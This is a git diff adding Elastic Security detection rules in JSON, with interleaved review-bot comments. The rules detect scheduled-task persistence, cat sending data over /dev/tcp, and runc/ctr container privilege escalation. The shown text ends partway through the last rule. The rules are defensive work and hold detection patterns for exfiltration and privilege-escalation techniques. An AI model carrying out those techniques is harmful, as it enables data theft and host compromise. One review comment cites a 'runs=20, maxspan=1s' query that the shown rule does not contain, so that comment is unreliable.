b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_106.json new file mode 100644 index 00000000000..07ebcdade4e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_106.json 
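Review bot: The `index` pattern `"logs-endpoint.events.*"` is broader than this query needs, since every clause in the EQL sequence reads process fields (`process.name`, `process.args_count`, `process.parent.name`, `process.parent.args`); the sibling rule version `afcce5ad-65de-4ed2-8516-5e093d3ac99a_107` later in this same diff narrows the equivalent pattern to `"logs-endpoint.events.process-*"`, and using that here would be the consistent choice and would also shrink the volume scanned for a `runs=20` sequence under `maxspan=1s`. Separately, this rule sets `"from": "now-9m"` without a `timestamp_override`, while `aebaa51f-2a91-4f6a-850b-b601db2293f4_7` earlier in the diff carries `"timestamp_override": "event.ingested"`; if omitting it is deliberate for this sequence rule, a sentence in the rule's `setup` or a `note` field saying so would help, otherwise events ingested late could fall outside the lookback window.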
@@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Indicates the creation of a scheduled task. Adversaries can use these to establish persistence, move laterally, and/or escalate privileges.", + "false_positives": [ + "Legitimate scheduled tasks may be created during installation of new software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Local Scheduled Task Creation", + "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type != \"end\" and\n ((process.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"wmic.exe\", \"mshta.exe\",\n \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"WmiPrvSe.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") or\n process.pe.original_file_name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"wmic.exe\", \"mshta.exe\",\n \"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\", \"WmiPrvSe.exe\", \"wsmprovhost.exe\",\n \"winrshost.exe\")) or\n ?process.code_signature.trusted == false)] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"schtasks.exe\" or process.pe.original_file_name == \"schtasks.exe\") and\n process.args : (\"/create\", \"-create\") and process.args : (\"/RU\", \"/SC\", \"/TN\", \"/TR\", \"/F\", \"/XML\") and\n /* exclude SYSTEM Integrity Level - look for task creations by non-SYSTEM user */\n not (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\")\n ] by process.parent.entity_id\n", + "references": [ + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1", + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-2" + ], + "related_integrations": [ + { 
+ "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "afcce5ad-65de-4ed2-8516-5e093d3ac99a", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "afcce5ad-65de-4ed2-8516-5e093d3ac99a_106", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_107.json b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_107.json new file mode 100644 index 00000000000..8980f764932 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_107.json 
@@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Indicates the creation of a scheduled task. Adversaries can use these to establish persistence, move laterally, and/or escalate privileges.", + "false_positives": [ + "Legitimate scheduled tasks may be created during installation of new software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Local Scheduled Task Creation", + "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type != \"end\" and\n ((process.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"wmic.exe\", \"mshta.exe\",\n \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"WmiPrvSe.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") or\n process.pe.original_file_name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"wmic.exe\", \"mshta.exe\",\n \"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\", \"WmiPrvSe.exe\", \"wsmprovhost.exe\",\n \"winrshost.exe\")) or\n ?process.code_signature.trusted == false)] by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"schtasks.exe\" or process.pe.original_file_name == \"schtasks.exe\") and\n process.args : (\"/create\", \"-create\") and process.args : (\"/RU\", \"/SC\", \"/TN\", \"/TR\", \"/F\", \"/XML\") and\n /* exclude SYSTEM Integrity Level - look for task creations by non-SYSTEM user */\n not (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\")\n ] by process.parent.entity_id\n", + "references": [ + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1", + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-2" + ], + 
"related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "afcce5ad-65de-4ed2-8516-5e093d3ac99a", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "afcce5ad-65de-4ed2-8516-5e093d3ac99a_107", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_5.json b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_5.json new file mode 100644 index 00000000000..71b9348ebfc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_5.json 
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of the cat command, followed by a connection attempt by the same process. Cat is capable of transfering data via tcp/udp channels by redirecting its read output to a /dev/tcp or /dev/udp channel. This activity is highly suspicious, and should be investigated. Attackers may leverage this capability to transfer tools or files to another host in the network or exfiltrate data while attempting to evade detection in the process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Activity Detected via cat", + "note": "## Triage and analysis\n\n### Investigating Network Activity Detected via cat\n\nAttackers may leverage the `cat` utility in conjunction with a listener to read all bytes of a file, and output the content to a `/dev/tcp` or `/dev/udp` channel to transfer/exfiltrate file contents to a remote system. \n\nThis rule looks for a sequence of a `cat` execution event followed by a network connection attempt by the same `cat` process. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate command and control activity or data exfiltration. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Suspicious Network Activity to the Internet by Previously Unknown Executable - 53617418-17b4-4e9c-8a2c-8deb8086ca4b\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and\n process.name == \"cat\" and process.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action in (\"connection_attempted\", \"disconnect_received\") and\n process.name == \"cat\" and not (destination.ip == null or destination.ip == \"0.0.0.0\" or cidrmatch(\n destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\",\n \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\",\n \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\",\n \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\",\n \"FF00::/8\"\n )\n )]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + 
"ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "afd04601-12fc-4149-9b78-9c3f8fe45d39", + "setup": "This rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 5 + }, + "id": "afd04601-12fc-4149-9b78-9c3f8fe45d39_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_6.json b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_6.json new file mode 100644 index 00000000000..26a789ea5fa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_6.json 
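Review bot: The `description` and the `note` say this rule catches `cat` transferring files "to another host in the network", but the network step of the sequence excludes every private, link-local and loopback destination via `cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", ...)`, so an internal transfer over `/dev/tcp` never alerts; the exclusion is presumably a deliberate noise reduction, in which case the `description` should say the rule only fires on connections to non-private addresses, otherwise the exclusion list needs revisiting. The same mismatch is present in the `_6` hunk that follows, which differs only in clause ordering and the added `## Setup` header. The network step also matches `event.action == "disconnect_received"`, which is not a "connection attempt" as the description states; a sentence in the `note` explaining why disconnect events are included would help triage. `transfering` in the `description` is misspelled.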
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of the cat command, followed by a connection attempt by the same process. Cat is capable of transfering data via tcp/udp channels by redirecting its read output to a /dev/tcp or /dev/udp channel. This activity is highly suspicious, and should be investigated. Attackers may leverage this capability to transfer tools or files to another host in the network or exfiltrate data while attempting to evade detection in the process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Activity Detected via cat", + "note": "## Triage and analysis\n\n### Investigating Network Activity Detected via cat\n\nAttackers may leverage the `cat` utility in conjunction with a listener to read all bytes of a file, and output the content to a `/dev/tcp` or `/dev/udp` channel to transfer/exfiltrate file contents to a remote system. \n\nThis rule looks for a sequence of a `cat` execution event followed by a network connection attempt by the same `cat` process. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate command and control activity or data exfiltration. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Suspicious Network Activity to the Internet by Previously Unknown Executable - 53617418-17b4-4e9c-8a2c-8deb8086ca4b\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.name == \"cat\" and process.parent.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action in (\"connection_attempted\", \"disconnect_received\") and\n process.name == \"cat\" and not (destination.ip == null or destination.ip == \"0.0.0.0\" or cidrmatch(\n destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\",\n \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\",\n \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\",\n \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\",\n \"FF00::/8\"\n )\n )]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + 
"ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "afd04601-12fc-4149-9b78-9c3f8fe45d39", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 6 + }, + "id": "afd04601-12fc-4149-9b78-9c3f8fe45d39_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_5.json b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_5.json new file mode 100644 index 00000000000..e5f8ecfaf4d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_5.json 
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of processes that interact with Linux containers through an interactive shell without root permissions. Utilities such as runc and ctr are universal command-line utilities leveraged to interact with containers via root permissions. On systems where the access to these utilities are misconfigured, attackers might be able to create and run a container that mounts the root folder or spawn a privileged container vulnerable to a container escape attack, which might allow them to escalate privileges and gain further access onto the host file system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation via Container Misconfiguration", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name == \"runc\" and process.args == \"run\") or\n (process.name == \"ctr\" and process.args == \"run\" and process.args in (\"--privileged\", \"--mount\"))\n) and not user.Ext.real.id == \"0\" and not group.Ext.real.id == \"0\" and \nprocess.interactive == true and process.parent.interactive == true\n", + "references": [ + "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation", + "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "group.Ext.real.id", + "type": "unknown" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + 
